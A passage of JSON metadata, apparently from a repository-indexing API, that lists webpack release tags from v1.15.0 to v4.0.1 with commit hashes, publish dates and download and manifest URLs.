bpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/mani